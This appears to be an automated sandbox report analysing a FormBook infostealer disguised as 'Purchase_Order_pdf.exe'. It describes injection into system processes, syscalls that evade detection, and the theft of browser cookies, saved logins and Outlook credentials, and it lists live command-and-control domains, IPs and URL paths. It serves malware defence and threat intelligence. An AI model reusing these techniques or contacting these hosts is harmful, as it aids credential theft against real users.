        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtClose: Direct from: 0x76EF2B6C
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 4676Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C12008Jump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"Jump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: Purchase_Order_pdf.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
        Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading        		412
        Process Injection        		2
        Virtualization/Sandbox Evasion        		1
        OS Credential Dumping        		111
        Security Software Discovery        		Remote Services1
        Email Collection        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Abuse Elevation Control Mechanism        		412
        Process Injection        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Data from Local System        		4
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545090 Sample: Purchase_Order_pdf.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 28 www.ngmr.xyz 2->28 30 www.huyven.xyz 2->30 32 18 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 5 other signatures 2->50 10 Purchase_Order_pdf.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 hEtOKWgxZfeL.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 hEtOKWgxZfeL.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 patioprojex.africa 197.189.237.186, 49991, 49992, 49993 xneeloZA South Africa 22->34 36 zhs.zohosites.com 136.143.186.12, 50023, 50024, 80 ZOHO-ASUS United States 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Purchase_Order_pdf.exe42%ReversingLabsWin32.Trojan.Swotter
        Purchase_Order_pdf.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        www.huyven.xyz1%VirustotalBrowse
        www.fieldelse.net6%VirustotalBrowse
        www.ngmr.xyz1%VirustotalBrowse
        galaxyslot88rtp.lat2%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
        https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
        https://duckduckgo.com/ac/?q=0%URL Reputationsafe
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
        https://www.ecosia.org/newtab/0%URL Reputationsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.huyven.xyz
        		162.0.238.246
        		truetrueunknown
        www.fieldelse.net
        		18.141.10.107
        		truetrueunknown
        www.ngmr.xyz
        		54.67.87.110
        		truetrueunknown
        galaxyslot88rtp.lat
        		162.0.209.213
        		truetrueunknown
        zhs.zohosites.com
        		136.143.186.12
        		truetrue
          		unknown
          dto20.shop
          		3.33.130.190
          		truetrue
            		unknown
            patioprojex.africa
            		197.189.237.186
            		truetrue
              		unknown
              wdeb18.top
              		206.119.82.147
              		truetrue
                		unknown
                www.drivedoge.website
                		195.161.68.8
                		truetrue
                  		unknown
                  h5hph710am.site
                  		144.34.186.85
                  		truetrue
                    		unknown
                    www.dverkom.store
                    		31.31.196.17
                    		truetrue
                      		unknown
                      www.bayarcepat19.click
                      		188.114.97.3
                      		truetrue
                        		unknown
                        www.wdeb18.top
                        		unknown
                        		unknowntrue
                          		unknown
                          www.dto20.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.h5hph710am.site
                            		unknown
                            		unknowntrue
                              		unknown
                              www.animekuid.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.lanxuanz.tech
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.longfilsalphonse.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.galaxyslot88rtp.lat
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.patioprojex.africa
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.patioprojex.africa/iv79/true
                                          		unknown
                                          http://www.drivedoge.website/czka/true
                                            		unknown
                                            http://www.wdeb18.top/jo6v/true
                                              		unknown
                                              http://www.lanxuanz.tech/1q08/true
                                                		unknown
                                                http://www.fieldelse.net/exug/true
                                                  		unknown
                                                  http://www.huyven.xyz/dbbh/true
                                                    		unknown
                                                    http://www.h5hph710am.site/ni9w/true
                                                      		unknown
                                                      http://www.galaxyslot88rtp.lat/sfat/true
                                                        		unknown
                                                        http://www.bayarcepat19.click/g48c/true
                                                          		unknown
                                                          http://www.dto20.shop/zlyl/true
                                                            		unknown
                                                            http://www.dverkom.store/fbcx/true
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/chrome_newtabrasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/ac/?q=rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://jino.rurasdial.exe, 00000005.00000002.4486451389.00000000055C6000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003036000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icorasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.lanxuanz.techhEtOKWgxZfeL.exe, 00000007.00000002.4487012045.0000000004F46000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    162.0.238.246
                                                                    		www.huyven.xyzCanada
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    136.143.186.12
                                                                    		zhs.zohosites.comUnited States
                                                                    		2639ZOHO-ASUStrue
                                                                    197.189.237.186
                                                                    		patioprojex.africaSouth Africa
                                                                    		37153xneeloZAtrue
                                                                    188.114.97.3
                                                                    		www.bayarcepat19.clickEuropean Union
                                                                    		13335CLOUDFLARENETUStrue
                                                                    31.31.196.17
                                                                    		www.dverkom.storeRussian Federation
                                                                    		197695AS-REGRUtrue
                                                                    144.34.186.85
                                                                    		h5hph710am.siteCanada
                                                                    		25820IT7NETCAtrue
                                                                    54.67.87.110
                                                                    		www.ngmr.xyzUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    206.119.82.147
                                                                    		wdeb18.topUnited States
                                                                    		174COGENT-174UStrue
                                                                    195.161.68.8
                                                                    		www.drivedoge.websiteRussian Federation
                                                                    		8342RTCOMM-ASRUtrue
                                                                    162.0.209.213
                                                                    		galaxyslot88rtp.latCanada
                                                                    		35893ACPCAtrue
                                                                    18.141.10.107
                                                                    		www.fieldelse.netUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    3.33.130.190
                                                                    		dto20.shopUnited States
                                                                    		8987AMAZONEXPANSIONGBtrue

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1545090
                                                                    Start date and time:2024-10-30 04:54:26 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 52s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Purchase_Order_pdf.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@23/12
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    23:56:31API Interceptor10851459x Sleep call for process: rasdial.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    162.0.238.246ekte.exeGet hashmaliciousFormBookBrowse
                                                                    • www.guldeu.xyz/qd68/
                                                                    EKTEDIR.exeGet hashmaliciousFormBookBrowse
                                                                    • www.guldeu.xyz/qd68/
                                                                    lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                    • www.jophy.life/umni/
                                                                    Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                    • www.kilbmn.xyz/a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl
                                                                    DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                    • www.buyiop.online/r6mm/
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.huyven.xyz/dbbh/
                                                                    Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                    • www.mistsui.top/r48b/
                                                                    RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                    • www.quantis.life/hczh/
